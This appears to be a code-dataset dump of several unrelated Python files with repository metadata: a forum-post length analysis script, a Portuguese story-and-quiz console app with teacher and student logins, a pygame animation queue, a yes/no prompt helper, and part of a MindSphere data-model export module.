def __iter__(self):
class IDXFileIter:
def __init__(self2):
self2.gkeys = self.gen_keys()
def __next__(self2):
return next(self2.gkeys)
return IDXFileIter()
def keys(self):
return self.index.keys()
def values(self):
class IDXFileVals:
def __iter__(self2):
self2.gkeys = self.gen_keys()
return self2
def __next__(self2):
k = next(self2.gkeys)
return self[k]
return IDXFileVals()
def items(self):
class IDXFileItems:
def __iter__(self2):
self2.gkeys = self.gen_keys()
return self2
def __next__(self2):
k = next(self2.gkeys)
return k, self[k]
return IDXFileItems()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
|
[
"javier@llopis.me"
] |
javier@llopis.me
|
cf7ce4febb11b3a8679e9c6d7b02823b9dd3d85b
|
981422eab8715257cf50078ecff93d6e4153a9fb
|
/preprocess/analysis.py
|
ab53996f235ff1c5d88cc8429c22c00d1a1d2cc7
|
[] |
no_license
|
FirmlyReality/guba_sentiment
|
d34227b99dc39ed28d41dc6b0b9f56dbf5564b24
|
b528d039ab8e80e8691e170ed2e7a9fd93bf8738
|
refs/heads/master
| 2020-04-19T16:25:06.892886
| 2019-05-04T07:26:51
| 2019-05-04T07:26:51
| 168,303,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,949
|
py
|
import pandas as pd
import os, sys
import time
import collections
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python analysis.py <inputDir>")
exit(1)
starttime = time.time()
inputDir = sys.argv[1]
files = os.listdir(inputDir)
tiezi_lencount = collections.Counter()
reply_lencount = collections.Counter()
tiezicnt = 0
replyscnt = 0
stocks_crawled = set()
for dfile in files:
print("Read from %s" % dfile)
code = dfile.split('_')[0]
stocks_crawled.add(code)
ftype = dfile.split('_')[1].split('.')[0]
data = pd.read_csv(inputDir+"/"+dfile,dtype=str)
print("Groupby ...")
if ftype == "reply":
#lendata = data.groupby(lambda x:len(str(data.loc[x]['content']))).size()
lendata = [len(str(c)) for c in data['content']]
lencount = reply_lencount
else:
#lendata = data.groupby(lambda x:len(str(data.loc[x]['content'])+str(data.loc[x]['title']))+1).size()
lendata = [len(str(data.loc[i]['content'])) + len(str(data.loc[i]['title'])) + 1 for i in data.index]
lencount = tiezi_lencount
lencount.update(lendata)
'''for lenidx in lendata.index:
if lenidx not in lencount:
lencount[lenidx] = lendata[lenidx]
else:
lencount[lenidx] += lendata[lenidx]'''
if ftype == 'tiezi':
tiezicnt += len(data)
else:
replyscnt += len(data)
#print(lencount)
print(time.time()-starttime)
tiezi_df = pd.DataFrame.from_dict(dict(tiezi_lencount), orient='index')
tiezi_df.rename(columns={0:'tiezicnt'},inplace=True)
reply_df = pd.DataFrame.from_dict(dict(reply_lencount), orient='index')
reply_df.rename(columns={0:'replycnt'},inplace=True)
lencntdf = tiezi_df.join(reply_df,how="outer",sort=True)
print(lencntdf)
lencntdf.to_csv('lencnt.csv',index=True)
'''allcnt = tiezicnt + replyscnt
now = 0
for lenidx in lencntdf.index:
now += lencount[lenidx]
if now > 0.95*allcnt:
print("length %d is on 0.95" % (lenidx))
print("now=%d allcnt=%d"%(now,allcnt))
break'''
print("Total tiezi count: "+str(tiezicnt))
print("Total reply count: "+str(replyscnt))
print("Read from need_stock.txt and build stocks_need set...")
stockfile = open("need_stock.txt")
stocks_need = set()
lines = stockfile.read().splitlines()
stockfile.close()
for l in lines:
lsplits = l.split()
code = lsplits[0]
if code in stocks_need:
print("Error! code exists!")
exit(1)
stocks_need.add(code)
print("Need but not crawled: ")
print(str(stocks_need-stocks_crawled))
print("Crawled but not need: ")
print(str(stocks_crawled-stocks_need))
|
[
"firmlyzhu@163.com"
] |
firmlyzhu@163.com
|
54bebeb806ed2a6d1e646e23ff48c820f6015356
|
f3ed28ec7242d335df9cbb2d49f5163f288b2b04
|
/interpreText.py
|
5c463ac0b6f12a9a9b7dcd92a6c87ca2386ef975
|
[] |
no_license
|
DanielXav/algoritmo-primeiro-periodo
|
97e60bf558fbf59535608982c983bef757757ab5
|
3743b8c221ddb05afa2ad9b9b78c3a5851636704
|
refs/heads/main
| 2023-05-15T17:24:51.994832
| 2021-06-15T17:31:55
| 2021-06-15T17:31:55
| 377,242,913
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,458
|
py
|
from time import sleep
titulos = list() #Listas e Dicionarios
temas = list()
cadastro = dict()
historia = dict()
historias = list()
questoes = dict()
listaQuestoes = list()
listProfessores = list()
listAlunos = list()
prof = dict()
aluno = dict()
#FUNÇÕES DOS PROFESSORES
def linha(tam=42): #Função para criar uma linha
return '-' * tam
def cadTemas(): #Cadastrar Temas
try:
tema = str(input('\033[1;30mDigite o tema: \033[m')).capitalize()
if tema not in temas:
temas.append(tema)
print('\033[1;30mTema\033[m \033[1;32m{}\033[m armazenado!\033[m'.format(tema))
except (ValueError, TypeError):
print('\033[1;30mErro na leitura dos temas!\033[m')
return temas
def cadHistorias(tema, titulo, historias): #Cadastrar histórias
try:
historia.clear()
historia['tema'] = tema
historia['titulo'] = titulo
historia[titulo] = str(input('\033[1;30mEntre com a historia: \033[m')) #Cada historia vai ser um dicicionario dentro de uma lista
historias.append(historia.copy())
print('\033[1;32mHistoria armazenada!\033[m')
except (ValueError, TypeError):
print("\033[1;31mErro na leitura das histórias!\033[m")
return historias
def mostrarTitulo(historias): #Mostra titulo das histórias disponiveis
print('\033[1;30mAs historias cadastradas foram: \n\033[m')
for historia in historias:
print(f'\033[1;34m{historia["titulo"]} \033[m')
def lerHistoria(historias): #Mostra a história
mostrarTitulo(historias)
titulo = input("\033[1;30mDigite o titulo da historia a ser lida: \033[m")
print()
print('\033[1;30mA historia escolhida foi: \n\033[m')
print(f'\033[1;34m{titulo} \n\033[m')
for historia in historias:
if (historia['titulo'] == titulo):
print()
print(f'{historia[titulo]} \n\n')
def apagarHistoria(historias): #Apagar uma história
mostrarTitulo(historias)
titulo = str(input("\033[1;30mQual a historia que voce deseja apagar? \033[m"))
apagada = False
for historia in historias:
if (historia['titulo'] == titulo):
historias.remove(historia)
apagada = True
break
if apagada:
print(f"\033[1;32mHistória {titulo} apagada! \033[m")
else:
print(f"\033[1;31mHistória {titulo} não encontrada! \033[m")
def printTemas(temas): #Mostra os temas cadastrados
print('\033[1;30mTemas cadastrados: \033[m')
if (len(temas) == 0):
print("\033[1;31mNao existem temas cadastrados\033[m")
for tema in temas:
print(tema)
def criarQuestoes(titulo): #Cria questões
questoes = dict() #Dicionario Principal, uma chave
perguntas = dict()
pergunta1 = dict() #Dicionario secundario
respostas1 = dict()
pergunta2 = dict()
respostas2 = dict()
pergunta3 = dict()
respostas3 = dict()
pergunta4 = dict()
respostas4 = dict()
pergunta5 = dict()
respostas5 = dict()
pergunta1['pergunta'] = str(input("\033[1;30mEntre com a primeira pergunta: \033[m"))
sleep(0.3)
print('Digite 5 respostas: ')
respostas1['a'] = str(input("\033[1;30mEntre com a resposta a: \033[m"))
respostas1['b'] = str(input("\033[1;30mEntre com a resposta b: \033[m"))
respostas1['c'] = str(input("\033[1;30mEntre com a resposta c: \033[m"))
respostas1['d'] = str(input("\033[1;30mEntre com a resposta d: \033[m"))
respostas1['e'] = str(input("\033[1;30mEntre com a resposta e: \033[m"))
sleep(0.3)
pergunta1['respostas'] = respostas1
pergunta1['resposta_certa'] = str(input("\033[1;30mEntre com o item da resposta certa: \033[m"))
perguntas['Pergunta 1'] = pergunta1
############################ Pergunta 2 #######################################
pergunta2['pergunta'] = input('Entre com a pergunta 2: ')
sleep(0.3)
print('Digite 5 respostas: ')
respostas2['a'] = str(input("Entre com a resposta a: "))
respostas2['b'] = str(input("Entre com a resposta b: "))
respostas2['c'] = str(input("Entre com a resposta c: "))
respostas2['d'] = str(input("Entre com a resposta d: "))
respostas2['e'] = str(input("Entre com a resposta e: "))
sleep(0.3)
pergunta2['respostas'] = respostas2
pergunta2['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
perguntas['Pergunta 2'] = pergunta2
########################### Pergunta 3 #######################################
pergunta3['pergunta'] = input('Entre com a pergunta 3: ')
sleep(0.3)
print('Digite 5 respostas: ')
respostas3['a'] = str(input("Entre com a resposta a: "))
respostas3['b'] = str(input("Entre com a resposta b: "))
respostas3['c'] = str(input("Entre com a resposta c: "))
respostas3['d'] = str(input("Entre com a resposta d: "))
respostas3['e'] = str(input("Entre com a resposta e: "))
sleep(0.3)
pergunta3['respostas'] = respostas3
pergunta3['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
perguntas['Pergunta 3'] = pergunta3
#
# ############################ Pergunta 4 #######################################
#
# pergunta3['pergunta'] = input('Entre com a pergunta 4: ')
#
# print('Digite 5 respostas: ')
#
# respostas4['a'] = str(input("Entre com a resposta a: "))
# respostas4['b'] = str(input("Entre com a resposta b: "))
# respostas4['c'] = str(input("Entre com a resposta c: "))
# respostas4['d'] = str(input("Entre com a resposta d: "))
# respostas4['e'] = str(input("Entre com a resposta e: "))
#
# pergunta4['respostas'] = respostas4
# pergunta4['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
# perguntas['Pergunta 4'] = pergunta4
#
# ############################ Pergunta 4 #######################################
#
# pergunta5['pergunta'] = input('Entre com a pergunta 5: ')
#
# print('Digite 5 respostas: ')
#
# respostas5['a'] = str(input("Entre com a resposta a: "))
# respostas5['b'] = str(input("Entre com a resposta b: "))
# respostas5['c'] = str(input("Entre com a resposta c: "))
# respostas5['d'] = str(input("Entre com a resposta d: "))
# respostas5['e'] = str(input("Entre com a resposta e: "))
#
# pergunta5['respostas'] = respostas5
# pergunta5['resposta_certa'] = str(input("Entre com o item da resposta certa: "))
# perguntas['Pergunta 5'] = pergunta5
questoes[titulo] = perguntas
listaQuestoes.append(questoes.copy())
return listaQuestoes
def leiaInt(msg): #Validação de um inteiro
while True:
try:
n = int(input(msg))
except (ValueError, TypeError):
print('\033[31mERRO: por favor, digite um numero inteiro valido.\033[m')
continue
except (KeyboardInterrupt):
print('\n\033[31mUsuario preferiu nao digitar esse numero.\033[m')
return 0
else:
return n
def cabecalho(txt): #Cabecalho
print(linha())
print(txt)
print(linha())
def menu(lista): #Menu principal dos professores
cabecalho('\033[1;35mMENU PRINCIPAL\033[m')
for c, iten in enumerate(lista):
sleep(0.3)
print(f'\033[1;30m{c + 1} - \033[m\033[1;36m{iten}\033[m')
print(linha())
opc = leiaInt('\033[1;30mSua Opcao: \033[m')
return opc
#FUNÇÕES ALUNOS
# recebe as histórias como parâmetro
def verificarTemas(historias): #Verifica se um tema é repetido e adiciona na lista
temaAleatorio = set() #Cria o set
for historia in historias:
temaAleatorio.add(historia['tema']) # o set já verifica se o elemento é repetido
temaAleatorio = list(temaAleatorio) # transforma o set em lista, pois set's não tem ordem definida
for i, tema in enumerate(temaAleatorio, start=1): # MOSTRA TEMAS
print(f' \033[1;30m{i} -\033[m \033[1;36m{tema}\033[m')
sleep(0.3)
return temaAleatorio # retorna a lista de temas
def leiaOpcao(historias, listaQuestoes):
dicionario = dict()
while True: # enquanto a escolha não for válida, pede que digite novamente
try:
escolha = int(
input(('\033[1;30mDigite o número que está relacionado com o tema a sua escolha: \033[m')))
print()
if 1 <= escolha <= len(temaAleatorio): #Pede pro usuário escolher o tema
break # escolha válida, sai do while
else:
print(f'\033[1;31mNúmero deve estar entre 1 e {len(temaAleatorio)}\033[m')
except ValueError: # se não digitar número, dá erro
print('\033[1;31mDigite um número válido\033[m')
cont = 0
tema_escolhido = temaAleatorio[escolha - 1]
for historia in historias:
if historia['tema'] == tema_escolhido: # Se a história tem o tema escolhido
cont += 1
if cont > 0:
print('\033[1;30mTítulos das histórias do tema escolhido:\033[m')
for historia in historias:
if historia['tema'] == tema_escolhido: #Aparece os titulos do tema escolhido
titulo = historia['titulo']
print(f'\033[1;34m{titulo}\033[m')
sleep(0.5)
print()
sair = 0
while sair == 0:
try:
titulo = input('\033[1;30mDigite a história você deseja ler e responder as questões: \033[m')
for historia in historias:
if historia['titulo'] == titulo: #Pede pra escolher entre os titulos do tema
print()
print(f'{historia[titulo]} \n\n')
sair = 1
except:
print('\033[1;30mO título que digitou não existe!\033[m')
#QUESTÕES
for i in range(len(listaQuestoes)): #Quais questões são do titulo que ele escolheu
if titulo in listaQuestoes[i]: #Vai relacionar as questões ao respectivo titulo
dicionario = listaQuestoes[i]
perguntas = dicionario[titulo]
respostasCertas = 0
for pk, pv in perguntas.items(): # Pk vai ser o numero da pergunta, pv vai ser a pergunta
print(f'{pk}: {pv["pergunta"]}')
print('\033[1;30mEscolha uma das opções: \033[m')
for rk, rv in pv['respostas'].items(): # Rk - Simbolo da alternativa, rv - texto da alternativa
print(f'[{rk}]: {rv}')
sleep(0.3)
sleep(3)
respostaUsuario = input('\033[1;30mSua resposta: \033[m')
if respostaUsuario == pv['resposta_certa']:
sleep(0.3)
print('\033[1;32mMuito bem! Você acertou.\033[m')
respostasCertas += 1
else:
sleep(0.3)
print('\033[1;31mErrou! Preste mais atenção!\033[m')
print()
quantPerguntas = len(perguntas)
if quantPerguntas > 0:
sleep(1)
porcentagemAcerto = respostasCertas / quantPerguntas * 100 #Porcentagem do total de acertos
print(f'\033[1;30mVocê acertou {respostasCertas} resposta(s).\033[m')
print(f'\033[1;30mSua porcentagem foi {porcentagemAcerto}%\033[m')
sleep(0.5)
else:
sleep(1)
print('\033[1;31mInfelizmente você não acertou nenhuma resposta!\033[m')
#FUNÇÕES CADASTRAMENTO
def cadastrarProfessor(): # Cadastrar o professor
prof['nomeProfessor'] = input('\033[1;30mDigite o nome do professor que você deseja cadastrar: \033[m')
prof['matriculaProfessor'] = input('\033[1;30mDigite a matricula do professor: \033[m')
prof['senhaProfessor'] = input('\033[1;30mDigite a senha do professor: \033[m')
listProfessores.append(prof.copy())
return listProfessores
def cadAdm(): #Cadastra os admin
inicio = 0
if inicio == 0:
nomeAdm = input('\033[1;30mDigite o seu primeiro nome: \033[m')
senhaAdm = input('\033[1;30mCadastre uma senha: \033[m')
inicio = 1
sleep(1)
print('\033[1;32mCadastrado como administrador do programa!!\033[m')
cont = 3
while cont > 0:
sleep(0.5)
senha = input('\033[1;30mDigite sua senha de administrador para acessar o programa: \033[m')
if (senhaAdm == senha):
erro = 1
while erro == 1:
try:
esc = input('\033[1;30mCadastrar matricula de um professor? [Sim/Nao] \033[m').strip().lower()[0]
erro = 0
except:
print('\033[1;31mDigite Sim ou Não!\033[m')
while esc == 's':
cadastrarProfessor()
sleep(0.5)
print('\033[1;32mCadastrado com sucesso!\033[m')
sleep(0.5)
erro = 1
while erro == 1:
try:
esc = input('\033[1;30mCadastrar nova matricula? [Sim/Nao] \033[m').strip().lower()[0]
erro = 0
except:
print('\033[1;31mDigite sim ou não!\033[m')
break
else:
cont -= 1
print(f'\033[1;31mVocê tem {cont} chances.\033[m')
def cadastrarUsuarios(): #Chama as funções de cadastro e também realiza cadastros
op = -1
aluno = dict()
while op != 0:
linha(42)
print('\033[1;30m1 - \033[m\033[1;36mLogin Admin\033[m')
sleep(0.3)
print('\033[1;30m2 - \033[m\033[1;36mLogin Professor\033[m')
sleep(0.3)
print('\033[1;30m3 - \033[m\033[1;36mLogin Aluno\033[m')
sleep(0.3)
print('\033[1;31m0 - SAIR\033[m')
sleep(0.3)
while op != 0:
try:
op = int(input(('\033[1;30mDigite a sua opção: \033[m'))) #Validação para ser um int como entrada
break
except ValueError: # se não digitar número, dá erro
print('\033[1;31mDigite um número válido\033[m')
if op == 1: #Se for 1, cadastra o admin
cadAdm()
elif op == 2: #Se for 2, loga o professor
matricula = input('\033[1;30mDigite sua matricula: \033[m')
for i in range(len(listProfessores)):
if matricula in listProfessores[i]['matriculaProfessor']:
cont = 3
while cont > 0:
senha = input('\033[1;30mDigite sua senha: \033[m')
if senha in listProfessores[i]['senhaProfessor']:
print('\033[1;32mLogado com sucesso!\033[m')
op = 2
return op
else:
cont -= 1
print(f'Você tem {cont} chances.')
else:
print('\033[1;31mMatricula não encontrada. Por favor procure a coordenação.\033[m')
else:
print('\033[1;31mMatricula não encontrada. Por favor procure a coordenação.\033[m')
elif op == 3: #se for 3, cadastra ou loga o aluno
erro = 1
while erro == 1:
try:
loginAluno = \
input('\033[1;30mDeseja se cadastrar ou logar? [Cadastrar/logar] \033[m').strip().lower()[
0] # Strip tira os espaços antes e depois, lower minusculo e [0] pega a primeira letra
erro = 0
except:
print('\033[1;31mOpção inválida!\033[m')
if loginAluno == 'c':
aluno['nome'] = input('\033[1;30mDigite o seu nome: \033[m')
aluno['matricula'] = input('\033[1;30mDigite sua matricula: \033[m')
senha1 = input('\033[1;30mDigite sua senha: \033[m')
senha2 = input('\033[1;30mConfirme sua senha: \033[m')
while senha1 != senha2:
print('\033[1;31mSenhas diferentes. Tente novamente!\033[m')
senha1 = input('\033[1;30mDigite sua senha: \033[m')
senha2 = input('\033[1;30mConfirme sua senha: \033[m')
aluno['senha'] = senha2
listAlunos.append(aluno.copy())
print('\033[1;32mCadastrado com sucesso!\033[m')
elif loginAluno == 'l':
matricula = input('\033[1;30mDigite sua matricula: \033[m')
if matricula.isnumeric():
for i in range(len(listAlunos)):
if matricula in listAlunos[i]['matricula']:
cont = 3
while cont > 0:
senha = input('\033[1;30mDigite sua senha: \033[m')
if senha in listAlunos[i]['senha']:
print('\033[1;32mLogado com sucesso!\033[m')
op = 3
return op
else:
cont -= 1
print(f'\033[1;30mVocê tem {cont} chances.\033[m')
else:
print('\033[1;30mMatricula não encontrada. Por favor cadastre-se!\033[m')
else:
print('\033[1;30mDigite número no campo.\033[m')
else:
print('\033[1;30mOpção Inválida! Tente Novamente!\033[m')
elif op == 0:
exit()
else:
print('\033[1;30mOpção invalida\033[m')
######################################## Programa Principal ########################################
#Chama as funções principais
op = -1
while (op != 0):
op = cadastrarUsuarios()
listaMenu = ['Cadastrar tema', 'Cadastrar historia', 'Mostrar titulos', 'Ler historia',
'Apagar historia', 'Mostrar temas', 'Criar questoes', 'Sair do Sistema']
if op == 2:
resposta = 1
while (resposta != len(listaMenu)):
resposta = menu(listaMenu)
if (resposta == 1):
cadTemas()
elif (resposta == 2):
printTemas(temas)
sair = 0
chances = 3
while (chances > 0):
tema = str(input('\033[1;30mEntre com o tema: \033[m')).capitalize()
if (tema in temas):
break
print("\033[1;31mTema inexistente, por favor tente outra vez!\033[m")
chances -= 1
print(f'\033[1;31mVoce tem {chances} chances!\033[m')
if (sair < 3):
titulo = str(input('\033[1;30mEntre com o titulo da historia: \033[m'))
cadHistorias(tema, titulo, historias)
elif (resposta == 3):
mostrarTitulo(historias)
elif (resposta == 4):
lerHistoria(historias)
elif (resposta == 5):
apagarHistoria(historias)
elif (resposta == 6):
printTemas(temas)
elif (resposta == 7):
mostrarTitulo(historias)
titulo = str(input('\033[1;30mEntre com o titulo da historia: \033[m')) #validação aqui
questoes = criarQuestoes(titulo)
elif resposta == (len(listaMenu)):
cabecalho('\033[1;30mSaindo do sistema... Ate logo!\033[m')
else:
print('\033[31mERRO! Digite uma opcao valida!\033[m')
sleep(5)
elif op == 3:
temaAleatorio = verificarTemas(historias)
leiaOpcao(historias, listaQuestoes)
|
[
"noreply@github.com"
] |
DanielXav.noreply@github.com
|
cb8bbb18812b781c6011712f275d27da47b49467
|
4180adc91a4f90580597df0f2eb631f71706b416
|
/animation_queue.py
|
0c18144c83ea7cb47f634c1eca603854ba2a68b8
|
[] |
no_license
|
allynbauer/nspygame
|
8935a7329109d29c535c652485329debf44d2295
|
8fb8d2dce7d4444636c358cf60f0e27da2584dee
|
refs/heads/master
| 2021-01-01T19:52:34.185553
| 2013-03-31T16:01:44
| 2013-03-31T16:01:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
from animation import *
class AnimationQueue(object):
def __init__(self):
self.animations = []
def add_animation(self, animation):
assert animation is not None
animation.queue = self
animation.began = pygame.time.get_ticks() # TODO: replace with clock
self.animations.append(animation)
def tick(self, clock):
for animation in self.animations:
animation.tick(clock)
finished_animations = filter(lambda animation: animation.animation_finished, self.animations)
for animation in finished_animations:
if callable(animation.finished_block):
animation.finished_block()
self.animations.remove(animation)
|
[
"allyn.bauer@gmail.com"
] |
allyn.bauer@gmail.com
|
8f58ceac773c503d7bcc188d51ad3750de9f0467
|
02d2657ca9d835996d0d9a883820f9f5d9e688bb
|
/02_yes_no.py
|
e14aa95c22450d33484e21d5718f74092dcaec70
|
[] |
no_license
|
konelliusbriggs/01_Lucky_Unicorn
|
8c459b2dee4207fef3ca5bc49ed53f5c23a24fbf
|
673bf493f5ebb322df9d7b7248a628625a58bfc4
|
refs/heads/main
| 2023-03-26T08:59:52.569920
| 2021-03-25T23:45:49
| 2021-03-25T23:45:49
| 351,277,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
def yes_no(question):
valid = False
while not valid:
response = input(question).lower()
if response == "y" or response == "yes":
return "yes"
elif response == "n" or response == "no":
return "no"
else:
print("Please enter yes / no")
played_before = yes_no("Have you played this game before? ")
if played_before != "yes":
print("show instructions")
|
[
"briggsk9489@masseyhigh.school.nz"
] |
briggsk9489@masseyhigh.school.nz
|
4989fa19a6d22301de71b13a5c533c0d567f84a2
|
ef714898ec6c6b7084770a488cd03f40586caa08
|
/modules/export.py
|
e55995848324804dcdcc0fed5aba64727b5b2a75
|
[
"MIT"
] |
permissive
|
mindsphere/dataModelHandler
|
24e9633c921e219b4d35458b1773bee20a66e6a6
|
6d5f415976794802ca8ccea66b26b2a7bcbec751
|
refs/heads/master
| 2023-04-28T16:59:11.470104
| 2021-05-18T14:32:55
| 2021-05-18T14:32:55
| 368,198,045
| 1
| 1
| null | 2021-05-18T14:32:12
| 2021-05-17T13:35:29
|
Python
|
UTF-8
|
Python
| false
| false
| 12,157
|
py
|
import uuid
import requests
import json
import datetime, traceback
import os
import sys
import configparser
import traceback
import csv
from pprint import pprint
import collections
from pathlib import Path
import helpers
#Custom Modules
import modules.readConfig as config
from modules.helpers import SimpleError, SingleAssetImporterInputDataset, SingleAgentInputDataset, SingleDatapointInputDataset
from modules.mindsphereApiCollection import *
from modules.datamodelClassDefinitions import Asset, AssetType, Aspect, ImportStatus
from modules.rowProcessor import convertRowsToClasses, extractAssetDefinitions, extractAspectDefinitions, extractAssetTypeDefinitions
from modules.mindsphereDataModelManager import MindsphereDataModelManager
from modules.apiHandler import ScopeNotFound
#######################################
########### MODULE CONFIG #############
#######################################
# The following block loads parameters from the config an provides them in an easy to use way in this modul:
# Instead of config.<parametername> you can just use <parametername> as standalone afterwards
thisModule = sys.modules[__name__]
requiredParamters= "logging, tenantname, parentIdsToBeExported, exportMode, exportedDataOutputFile, exportAgentAndMappingConfiguration, convertToNeutralIds"
config.setSimpleConfigParametersToModule(thisModule, requiredParamters)
#Create Directory for Output#
agentDefinitionsFileName = "agentDefinition.csv"
directory = os.path.dirname(exportedDataOutputFile)
Path(directory).mkdir(parents=True, exist_ok=True)
#######################################
######### HELPER FUNCTIONS ############
#######################################
def convertMappingDictToOrderedColumnDict(mappingDict):
outputColumnsList = []
for attribute in mappingDict:
if isinstance(mappingDict[attribute], dict):
columnheaders = mappingDict[attribute]["matchingInputHeaders"]
if mappingDict[attribute].get("excludeFromExport"):
continue
else:
columnheaders = mappingDict[attribute]
if isinstance(columnheaders, tuple):
value = columnheaders[0] #In case there are multiple allowed headers for an output file, take the first one
else:
value = columnheaders
outputColumnsList.append(value)
return collections.OrderedDict([ (k, None) for k in outputColumnsList])
#######################################
#######################################
############ MAIN BLOCK ###############
#######################################
def attachDataSourcesToAgentAsset(agentAsset, mindsphereDataModelManager):
mindsphereDataModelManager.collectDataSourcesForAgent(agentAsset)
#######################################
def attachDeviceConfigToAgentAsset(agentAsset, mindsphereDataModelManager):
mindsphereDataModelManager.collectDeviceConfigForAgent(agentAsset)
#######################################
def attachDatapointMappingsToAgentAsset(agentAsset,listOfAllAssetsToBeProcessed, mindsphereDataModelManager):
omittedTargetAssets = []
mindsphereDataModelManager.collectValidDataPointMappingForAgent(agentAsset)
for dataSource in agentAsset.agentData.dataSources:
for dataPoint in dataSource.dataPoints:
for mapping in dataPoint.dataPointMappings:
if mapping.targetAsset:
targetAssetInScope = next((asset for asset in listOfAllAssetsToBeProcessed if asset.assetId == mapping.targetAsset.assetId),None)
if not targetAssetInScope:
if not next((asset for asset in omittedTargetAssets if asset.assetId == mapping.targetAsset.assetId), None):
omittedTargetAssets.append(mapping.targetAsset)
print(f"Attention! A target Device-Asset '{mapping.targetAsset.name}' for a mapping is not included in export defintion. Datapoint Mappings pointing to this asset will be omitted from export!")
#TODO Review: Das Ding trotzdem zu exportieren, mit einer Referenz auf ein Dummy Asset macht vermutlich keinen Sinn
else:
print(f"Attention! A target Device-Asset for a mapping is not existing in MindSphere.")
print(f"The related agent is: '{agentAsset.name}'). This is probably due to an invalid mapping ...")
dataPoint.dataPointMappings = list(filter(lambda x: mapping.targetAsset not in omittedTargetAssets, dataPoint.dataPointMappings))
#######################################
def addFullAgentInformation(assetsToBeProcessed, mindsphereDataModelManager):
for asset in assetsToBeProcessed:
if asset.agentData:
try:
# First, get a potential device config
attachDeviceConfigToAgentAsset(asset, mindsphereDataModelManager)
attachDataSourcesToAgentAsset(asset, mindsphereDataModelManager)
if asset.agentData.dataSources:
# Last step: add all the existing mappings, but only if the mapped asset is part of the export
attachDatapointMappingsToAgentAsset(asset, assetsToBeProcessed, mindsphereDataModelManager)
except ScopeNotFound as e:
print(f"!!! Attention !!! Skipping collecting of agent information for the asset '{asset.name}'...")
print(f" Reason: Unkown assetType '{e}' for agent-scope detection!")
print("")
return None
#######################################
def start():
# 1. Extract all assets (and optionally asset-types and aspects) from Mindsphere
print("="*80)
print("Initialize MindSphere data model now...")
mindsphereDataModelManager = MindsphereDataModelManager(fullMode = exportMode == "full")
# 2. Find all children
# Go through list of parents to be exported and add all childs-assets to an export batch
exportBatches = {}
#In case there is only one parent asset to be exported, convert it to a list first
parentIdsToBeExportedAsList = []
if isinstance(parentIdsToBeExported, str):
parentIdsToBeExportedAsList.append(parentIdsToBeExported)
else:
parentIdsToBeExportedAsList = parentIdsToBeExported
print("")
print("... identifing data to be exported based on the source definition for the export now")
for parentID in parentIdsToBeExportedAsList:
currentParentAssets = mindsphereDataModelManager.getAssetsIncludingUserDecision(parentID, allowMultipleSelections=True)
if not currentParentAssets:
continue
for assetToBeExported in currentParentAssets:
assetsWithChilds = mindsphereDataModelManager.getListWithAllChildren(assetToBeExported, parentsFirst=True)
exportBatches[assetToBeExported.assetId] = assetsWithChilds
# 3. Merge all export batches for all given parents
# Now merge data for all given export batches (which might have been definied via various parent ids given in the configuration file)
mergedAssetListForExport = []
for currentBatch in exportBatches:
for currentAsset in exportBatches[currentBatch]:
if not next((x for x in mergedAssetListForExport if currentAsset.assetId == x.assetId), None):
mergedAssetListForExport.append(currentAsset)
# 4. Add Agent Data
# This only takes place in case datasources and mapping should also be exported (which is defined in the config):
if exportAgentAndMappingConfiguration:
# Go through list with all agents and mark the coressponding assets as agents:
# If asset is an agent, add the agent data with device information, defined datasources and mappings
# For the ID mapping use a tracking dict, that maps internal IDs to neutral IDs (agentIDs, DatasourceIDs, Mapping IDs)
# If an agent AgentAsset has been identified, the mapping list has to be looked through, to identify mapped assets:
# -> In case the mapped assets are part of the export, they also need a neutral flag.
# -> In case the are not included in the export, a warning should be provided, but the asset will not be exported
print("... collecting agent data for assets to be exported now")
addFullAgentInformation(mergedAssetListForExport, mindsphereDataModelManager)
# 5. Derive lists with columns that need to be populated during the export run and that will be existing in the output format
# Those columns should be the "opposite" of the import attributes, so that the import and export formats are compatible
# Preparation for assets
# The mapping dictionary contains the relation between object-attributes and the columns in the output-file
mappingDictAssets = SingleAssetImporterInputDataset.mappingDict
orderedOutputColumnsDictForAssetExport = convertMappingDictToOrderedColumnDict(mappingDictAssets)
# 6. Export asset information as csv
outputListAssets = []
# Initialize an empty ordered dict that will be populated during the export preparation
# The keys are the names of the output
for currentAsset in mergedAssetListForExport:
print("Processing asset '{}' with id '{}' now".format(currentAsset.name, currentAsset.assetId))
workingDictList = currentAsset.outputAsDictionaryList(orderedOutputColumnsDictForAssetExport, fullMode = exportMode == "full")
outputListAssets.extend(workingDictList)
# 7 Write asset Information to csv - this could be an issue since it overwrites everything with that tenantname (also descriptions and such)
replaceList = [{"oldString": tenantname + ".", "newString" : "[$$$TENANTNAME$$$]."}]
helpers.writeListOfSimilarDictToCsv(outputListAssets, exportedDataOutputFile, replaceList)
# 7. Prepare and export relevant agent information as csv
if exportAgentAndMappingConfiguration:
# Preparation for agents
mappingDictAgents = SingleAgentInputDataset.mappingDict
mappingDictDatapoints = SingleDatapointInputDataset.mappingDict
orderedOutputColumnDictForAgents = convertMappingDictToOrderedColumnDict(mappingDictAgents)
orderedOutputColumnDictForDatapoints = convertMappingDictToOrderedColumnDict(mappingDictDatapoints)
for currentAsset in mergedAssetListForExport:
if currentAsset.agentData:
#Create Subfolder for all Agent related data
agentDirectory = os.path.join(directory,"agentDefinitions",currentAsset.name + "_" + currentAsset.assetId)
Path(agentDirectory).mkdir(parents=True, exist_ok=True)
#Export Agent-Data with Datasource-Definitions
agentDataDictList = currentAsset.agentData.getDictListOutputForAgent(orderedOutputColumnDictForAgents)
replaceList = []
agentDefinitionFileName = os.path.join(agentDirectory,agentDefinitionsFileName)
helpers.writeListOfSimilarDictToCsv(agentDataDictList, agentDefinitionFileName, replaceList)
#Export DataPoints with DataPointMappings for each Datasource,
for dataSource in currentAsset.agentData.dataSources:
agentDatapointsAndMappingsDictList = dataSource.getDictListOutputForDataPointsAndMappings(orderedOutputColumnDictForDatapoints)
dataSourceFileName = os.path.join(agentDirectory,dataSource.dataPointsFileName)
